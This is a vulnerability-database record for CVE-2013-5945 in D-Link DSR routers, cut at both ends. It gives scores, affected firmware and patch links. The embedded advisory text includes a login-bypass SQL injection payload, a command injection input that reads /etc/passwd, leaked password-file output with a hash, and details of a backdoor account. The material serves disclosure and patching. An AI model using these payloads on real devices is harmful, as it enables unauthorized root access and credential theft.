1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd
1141 root 37000 S /pfrm2.0/bin/sshd
1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db
1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db
1560 root 0 SW< [key_timehandler]
1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
1600 root 8036 S rvgd /tmp/system.db
1612 root 0 SW [cavium]
1621 root 8424 S vpnKAd /tmp/system.db
1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d
1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d
1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd
1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
1771 root 2680 S /pfrm2.0/bin/statusD
1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db
1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db
1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db
2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db
2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db
2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db
2205 root 1904 S /pfrm2.0/bin/fReset
2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh
2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100
2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
3355 root 1768 S /pfrm2.0/bin/rt2860apd
3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
5353 root 2704 S -sh
7877 root 2568 S sleep 60
7953 root 2568 S sleep 60
8008 root 2704 R ps
16749 root 2704 S -sh
25690 root 0 SW< [RtmpCmdQTask]
25692 root 0 SW< [RtmpWscTask]
DSR-250N>
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "dsr-250",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b44"
},
{
"_id": null,
"model": "dsr-500",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b44"
},
{
"_id": null,
"model": "dsr-150n",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b64"
},
{
"_id": null,
"model": "dsr-150",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b44"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-150",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"_id": null,
"model": "dsr-150n",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.05b64"
},
{
"_id": null,
"model": "dsr-250",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"_id": null,
"model": "dsr router dsr-500",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-1000",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-1000n",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-150",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-150n",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-250n",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr router dsr-500n",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-500n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-500",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-250n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-250",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-150n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-150",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-1000n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-1000",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"_id": null,
"model": "dsr-500n 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-500 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-250n 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-250 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-150n 1.05b64",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-150 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-1000n 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"_id": null,
"model": "dsr-1000 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15014"
},
{
"db": "BID",
"id": "64172"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007216"
},
{
"db": "NVD",
"id": "CVE-2013-5945"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dsr-1000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-1000n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-150n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-250n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-500n_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007216"
}
]
},
"credits": {
"_id": null,
"data": "nu11.nu11",
"sources": [
{
"db": "BID",
"id": "64172"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-319"
}
],
"trust": 0.9
},
"cve": "CVE-2013-5945",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-5945",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2013-007216",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-15014",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2013-5945",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2013-007216",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-5945",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2013-007216",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2013-15014",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-319",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15014"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007216"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-319"
},
{
"db": "NVD",
"id": "CVE-2013-5945"
}
]
},
"description": {
"_id": null,
"data": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. plural D-Link The product has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability. #\n# CVEs: \n# CVE-2013-5945 - Authentication Bypass by SQL-Injection\n# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution\n# \n# Vulnerable Routers: \n# D-Link DSR-150 (Firmware \u003c v1.08B44)\n# D-Link DSR-150N (Firmware \u003c v1.05B64)\n# D-Link DSR-250 and DSR-250N (Firmware \u003c v1.08B44)\n# D-Link DSR-500 and DSR-500N (Firmware \u003c v1.08B77)\n# D-Link DSR-1000 and DSR-1000N (Firmware \u003c v1.08B77)\n#\n# Download URL: \n# http://tsd.dlink.com.tw\n# \n# Arch: \n# mips and armv6l, Linux\n# \n# Author: \n# 0_o -- null_null\n# nu11.nu11 [at] yahoo.com\n#\n# Date: \n# 2013-08-18\n# \n# Purpose: \n# Get a non-persistent root shell on your D-Link DSR. \n# \n# Prerequisites: \n# Network access to the router ports 443 and 23. \n# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!\n#\n#\n# A list of identified vulns follows. This list is not exhaustive as I assume\n# more vulns are present that just slipped my attention. \n# The fact that D-Link implemented a backdoor user (for what reason, please??)\n# and just renamed it instead of completely removing it after it was targetted\n# by my previous exploit, as well as the triviality of those vulns I found \n# makes me suggest that more vulns are present that are comparably easy to\n# exploit. \n#\n# Since 2013-12-03, patches are available for:\n# DSR-150: Firmware v1.08B44\n# DSR-150N: Firmware v1.05B64\n# DSR-250 and DSR-250N: Firmware v1.08B44\n# DSR-500 and DSR-500N: Firmware v1.08B77\n# DSR-1000 and DSR-1000N: Firmware v1.08B77\n# via http://tsd.dlink.com.tw\n#\n# And now, have a worthwhile read :-)\n#\n\n\n0. Contents:\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection \n (CVE-2013-5945)\n2. Vulnerability: Privilege Escalation by Arbitrary Command Execution \n (CVE-2013-5946)\n3. Exposure: D-Link backdoor user\n4. Vulnerability: Use of weak hash algorithms\n5. Exposure: Passwords are stored as plain text in config files\n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection\n (CVE-2013-5945)\n\n\n* Possible via the global webUI login form. \n\n* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:\n\n function login.authenticate(tablename, tableInput)\n local username = tableInput[\"Users.UserName\"]\n local password = tableInput[\"Users.Password\"]\n local cur = db.execute(string.format([[\n SELECT *, ROWID AS _ROWID_ FROM %s\n WHERE %s = \u0027%s\u0027 AND %s = \u0027%s\u0027\n ]], tablename, \"UserName\", username, \"Password\", password))\n local result = false\n local statusCode = \"NONE\"\n if cur then\n local row = cur:fetch({}, \"a\")\n cur:close()\n result = row ~= nil\n if result == false then\n statusCode = \"USER_LOGIN_INVALID_PASSWORD\"\n end\n end\n return result, statusCode\n end\n\n* This function creates an SQL statement of the form:\n\n SELECT * FROM \"Users\" WHERE \"UserName\" = \u0027user\u0027 AND \"Password\" = \u0027pass\u0027;\n\n* Since there is a default admin user account called \"admin\" around, this is \n easily exploitable by providing this to the login form:\n\n username = admin\n password = \u0027 or \u0027a\u0027=\u0027a\n\n* ...resulting in this SQL statement:\n\n SELECT * \n FROM \"Users\" \n WHERE \"UserName\" = \u0027admin\u0027 \n AND \"Password\" = \u0027\u0027 or \u0027a\u0027=\u0027a\u0027;\n\n* Old school SQL injection. Ohh, by the way... \n\n* The same fault can be found in captivePortal.lua \n -- FREE NETWORKS FOR EVERYONE --\n\n\n\n2. Vulnerability: Privilege Escalation by Arbitrary Command Execution \n (CVE-2013-5946)\n\n\n* Possible from the Tools --\u003e System Check page. \n\n* File /pfrm2.0/var/www/systemCheck.htm contains:\n\n local function runShellCmd(command)\n local pipe = io.popen(command .. \" 2\u003e\u00261\") -- redirect stderr to stdout\n local cmdOutput = pipe:read(\"*a\")\n pipe:close()\n return cmdOutput\n end\n if (ButtonType and ButtonType == \"ping\") then\n [...]\n local cmd_ping = pingprog .. \" \" .. ipToPing .. \" \" .. options1 .. \" \u003e \" .. pingfile\n globalCmdOutput = runShellCmd (cmd_ping) \n statusMessage = \"Pinging \" .. ipToPing\n [...]\n elseif (ButtonType and ButtonType == \"traceroute\") then\n [...]\n local cmd = traceRouteProg .. \" \" .. ipToTraceRoute .. options\n globalCmdOutput = runShellCmd(cmd)\n statusMessage = \"Traceroute To \" .. ipToTraceRoute .. \"...\"\n [...]\n elseif (ButtonType and ButtonType == \"dnslookup\") then\n [...]\n util.appendDebugOut(\"Exec = \" .. os.execute(nsLookupProg .. \" \" .. internetNameToNsLookup .. \" \u003e \" .. nsLookupFile))\n statusMessage = \"DNS Lookup for \" .. internetNameToNsLookup\n [...]\n\n* Command injection is possible in at least these form sections:\n \n Ping or Trace an IP Address\n Perform a DNS Lookup\n \n* When using a browser, deactivate the \"onclick\" JavaScript checks using \n a tool like Firebug. Tools like curl are not hindered by these checks. \n \n* All forms allow input like this:\n \n localhost;\u003ccommand\u003e\n \n example: \n \n localhost;cat /etc/passwd\n \n* This user provided value is then directly used as part of the input for the\n call to runShellCmd(c) and thus io.popen(c) in the first form section and \n os.execute(c) in the second form section. \n \n* Output from user provided commands gets displayed on the next page beneath \n the benign command output. \n \n example: \n \n [...]\n \u003ctextarea rows=\"15\" name=\"S1\" cols=\"60\" wrap=\"off\" class=\"txtbox1\"\u003e\n traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets\n 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms\n root:!:0:0:root:/root:/bin/sh\n gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n nobody:x:0:0:nobody:/nonexistent:/bin/false\n ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n \u0026lt;/textarea\u0026gt;\n [...]\n \n \n \n3. Exposure: D-Link backdoor user:\n \n \n* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:\n\n root:!:0:0:root:/root:/bin/sh\n gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n nobody:x:0:0:nobody:/nonexistent:/bin/false\n ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n\n* You can see the old D-Link backdoor user name \"ZX4q9Q9JUpwTZuo7\". \n That was the account I hacked before with my previous exploit: \n http://www.exploit-db.com/papers/22930/\n And there is a new backdoor user \"gkJ9232xXyruTRmY\" introduced. \n Instead of removing the backdoor, D-Link just created a new one. \n \n* I verified this by showing the /etc/profile:\n \n # /etc/profile\n LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib\n PATH=.:/pfrm2.0/bin:$PATH\n CLISH_PATH=/etc/clish\n export PATH LD_LIBRARY_PATH CLISH_PATH\n # redirect all users except root to CLI\n if [ \"$USER\" != \"gkJ9232xXyruTRmY\" ] ; then\n trap \"/bin/login\" SIGINT\n trap \"\" SIGTSTP\n /pfrm2.0/bin/cli\n exit\n fi\n PS1=\u0027DSR-250N\u003e \u0027\n \n \n \n4. Vulnerability: Use of weak hash algorithms:\n\n\n* In the /etc/shadow, salted DES hashes are used to store user passwords. \n Since this hash type supports at most 8 characters, users can log in by just \n typing the first 8 letters of their passwords when using SSH or telnet. \n \n* An effective password length limitation of 8 characters makes brute force \n attacks on user accounts very feasible, even if the user chose a longer \n password. \n\n\n\n5. Exposure: Passwords are stored as plain text in config files:\n\n\n* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the \n /tmp/system.db is built on boot time, reveals that all user passwords are \n stored in plain text. \n\n Example:\n\n [...] \n Users = {}\n Users[1] = {}\n Users[1][\"Capabilities\"] = \"\"\n Users[1][\"DefaultUser\"] = \"1\"\n Users[1][\"UserId\"] = \"1\"\n Users[1][\"FirstName\"] = \"backdoor\"\n Users[1][\"OID\"] = \"0\"\n Users[1][\"GroupId\"] = \"1\"\n Users[1][\"UserName\"] = \"gkJ9232xXyruTRmY\"\n Users[1][\"Password\"] = \"thisobviouslyisafakepass\"\n Users[1][\"UserTimeOut\"] = \"10\"\n Users[1][\"_ROWID_\"] = \"1\"\n Users[1][\"LastName\"] = \"ssl\"\n [...]\n \n \n \n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n* This file should have 600 permissions set and not 644. It is world readable. \n Pointless, since every process runs as root, no user separation is \n done anyway. \n\n DSR-250N\u003e ls -l -a /etc/shadow\n -rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow\n DSR-250N\u003e ps\n PID USER VSZ STAT COMMAND\n 1 root 2700 S init\n 2 root 0 SW\u003c [kthreadd]\n 3 root 0 SW\u003c [ksoftirqd/0]\n 4 root 0 SW\u003c [events/0]\n 5 root 0 SW\u003c [khelper]\n 8 root 0 SW\u003c [async/mgr]\n 111 root 0 SW\u003c [kblockd/0]\n 120 root 0 SW\u003c [khubd]\n 123 root 0 SW\u003c [kseriod]\n 128 root 0 SW\u003c [kslowd]\n 129 root 0 SW\u003c [kslowd]\n 150 root 0 SW [pdflush]\n 151 root 0 SW [pdflush]\n 152 root 0 SW\u003c [kswapd0]\n 200 root 0 SW\u003c [aio/0]\n 210 root 0 SW\u003c [nfsiod]\n 220 root 0 SW\u003c [crypto/0]\n 230 root 0 SW\u003c [cns3xxx_spi.0]\n 781 root 0 SW\u003c [mtdblockd]\n 860 root 0 SW\u003c [usbhid_resumer]\n 874 root 0 SW\u003c [rpciod/0]\n 903 root 0 SWN [jffs2_gcd_mtd4]\n 909 root 0 SWN [jffs2_gcd_mtd5]\n 918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R\n 999 root 1816 S \u003c /pfrm2.0/udev/sbin/udevd --daemon\n 1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db\n 1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db\n 1049 root 2704 S /usr/sbin/telnetd -l /bin/login\n 1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd\n 1141 root 37000 S /pfrm2.0/bin/sshd\n 1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5\n 1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db\n 1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5\n 1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db\n 1560 root 0 SW\u003c [key_timehandler]\n 1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf\n 1600 root 8036 S rvgd /tmp/system.db\n 1612 root 0 SW [cavium]\n 1621 root 8424 S vpnKAd /tmp/system.db\n 1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d\n 1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d\n 1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd\n 1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh\n 1771 root 2680 S /pfrm2.0/bin/statusD\n 1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db\n 1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db\n 1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db\n 2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db\n 2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db\n 2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db\n 2205 root 1904 S /pfrm2.0/bin/fReset\n 2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh\n 2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100\n 2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va\n 2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va\n 3355 root 1768 S /pfrm2.0/bin/rt2860apd\n 3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va\n 3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va\n 3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var\n 3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid\n 3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c\n 3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-\n 5353 root 2704 S -sh\n 7877 root 2568 S sleep 60\n 7953 root 2568 S sleep 60\n 8008 root 2704 R ps\n 16749 root 2704 S -sh\n 25690 root 0 SW\u003c [RtmpCmdQTask]\n 25692 root 0 SW\u003c [RtmpWscTask]\n DSR-250N\u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5945"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007216"
},
{
"db": "CNVD",
"id": "CNVD-2013-15014"
},
{
"db": "BID",
"id": "64172"
},
{
"db": "PACKETSTORM",
"id": "124319"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2013-5945",
"trust": 3.4
},
{
"db": "EXPLOIT-DB",
"id": "30061",
"trust": 2.4
},
{
"db": "BID",
"id": "64172",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007216",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-15014",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201312-319",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "124319",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15014"
},
{
"db": "BID",
"id": "64172"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007216"
},
{
"db": "PACKETSTORM",
"id": "124319"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-319"
},
{
"db": "NVD",
"id": "CVE-2013-5945"
}
]
},
"id": "VAR-202002-0660",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15014"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15014"
}
]
},
"last_update_date": "2024-11-23T22:08:28.136000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.dlink.com/"
},
{
"title": "Patch for SQL Injection Vulnerability for D-Link DSR Router Series",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/41586"
},
{
"title": "D-Link DSR Router Series SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=108894"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15014"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007216"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-319"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007216"
},
{
"db": "NVD",
"id": "CVE-2013-5945"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.4,
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"trust": 1.6,
"url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
},
{
"trust": 1.6,
"url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
},
{
"trust": 1.6,
"url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
},
{
"trust": 1.6,
"url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5945"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5945"
},
{
"trust": 0.6,
"url": "http://www.linuxidc.com/linux/2013-12/93897.htm"
},
{
"trust": 0.3,
"url": "http://tsd.dlink.com.tw/"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
},
{
"trust": 0.1,
"url": "http://www.exploit-db.com/papers/22930/"
},
{
